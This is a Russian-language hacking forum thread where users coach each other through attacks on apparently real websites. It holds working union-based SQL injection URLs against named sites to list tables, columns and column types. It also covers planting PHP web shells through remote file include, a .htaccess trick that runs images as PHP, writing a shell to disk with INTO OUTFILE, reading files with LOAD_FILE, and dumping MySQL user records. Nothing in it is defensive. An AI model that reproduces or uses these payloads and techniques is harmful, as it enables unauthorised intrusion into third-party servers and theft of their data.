ты прикалываешься? Code: http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5,6,7,8,9,10+FROM+information_schema.tables+where+table_name%3E0x75736572+--+ А что ты вообще сделать хочешь?
я ету знаю..мне нуэн вот здес написат полное имя.. http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75736572+--+ в конце написат полное имя таблици..и в какоы кодировке как написать ??
Code: http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4%20,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_name=0x7573657273+--+ Открываешь исходный код, ищешь к примеру password и там все колонки, а вообще просто дописываешь and+column_name>hex твоей последней полученной колонки. Не глупи, и сам экспериментируй
Ребята, я вроде как не полный новичок, просто никогда не работал с шелами. Но надо же когда-то начинать Вопрос больше по теоретической части, по поводу запуска шела через php-include. Вот есть у меня на сайте шел http://mysite.com/shell.php, и есть инклуд (глобальный) http://site.com/index.php?dir=asdsad. Делаем так: http://site.com/index.php?dir=http://mysite.com./shell.php%00 (только не надо говорить, что такие ситуации сейчас встречаются редко и т.д. просто представим такую ситуацию, что все работает). Ну и собственно у меня появляется на мониторе мой шел. А теперь объясните мне, какой от него толк?! Ведь шел залит-то на моём сайте, и отображает директории все и информацию именно о моём сайте Просто отобразился мой шел с моего сайта на сайте site.com как бы в отдельном фрейме. Может быть у меня какое-то размытое понятие о шелах, об их разновидностях и использовании. Сам юзаю c99madshell. Увы, детальную инфу о шелах на форуме не нашел. Если я где-то что-то провтыкал, прошу указать, где можно об этом почитать. Заранее благодарен
Если там всеже ремоут инклюд,а не фрейм, тогда переименуй свой шелл в http://mysite.com/shell.txt и пробуй так
Проблема в том что у тя сайт поддерживает пхп а надо шелл держать либо на хосте без пхп, или изменить расширение....
Да, точно, http://mysite.com/shell.txt заработало Хм, теперь стало чуть понятней принцип. Спасибо. А может кто-то дать ссылку на хорошую инфу по шелам? И каким лучше всего шелом пользоваться?
редкий шелл - но крутой dxshell. лит-ры в основном нету, шелл это файловый менеджер.+ выполнение смд Постучись ко мне - скажи что не понимаешь объясню
Ошибка какая? попрбуй .htaccess залить AddType application/x-httpd-php .php .htm .html .jpg .gif потом выбирай то что заливается =)
Такая проблема: Нашел скулю заливаю через нее шелл INTO OUTFILE 'D:\htdocs\www.site.ru\shel.php' из внешки его не вижу, а по LOAD_FILE нормально видит. По LOAD_FILE невидно ни одного файла кроме тех что сам залил. В ошибках путь вылазит: D:\htdocs\www.site.ru\index.php D:\htdocs\www.site.ru\admin\conf.php Как найти реальное расположение сайта или что ето за прикол такой)?
Ну наверное тогда путь не тот База на другом серваке Чмоды concat_ws(0x3a,user,host)+from+mysql.user посмотри как прописан твой user()
А можно ли в инъекции определить тип поля и длину(если Text)? Пока ходил курить, нашёл ответ, если кого заинтересовало и кто не знает: GROUP_CONCAT(column_name,0x3a,column_type) from information_schema.columns where table_name='tablename'
Code: http://www.dsthosting.com/billing/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,GROUP_CONCAT(column_name,0x3a,column_type,0x3a,CHARACTER_MAXIMUM_LENGTH),9,10,11,12,13,GROUP_CONCAT(column_name,0x3a,column_type),15,16+from+information_schema.columns-- Мне предоставляется!) ИМХО!)
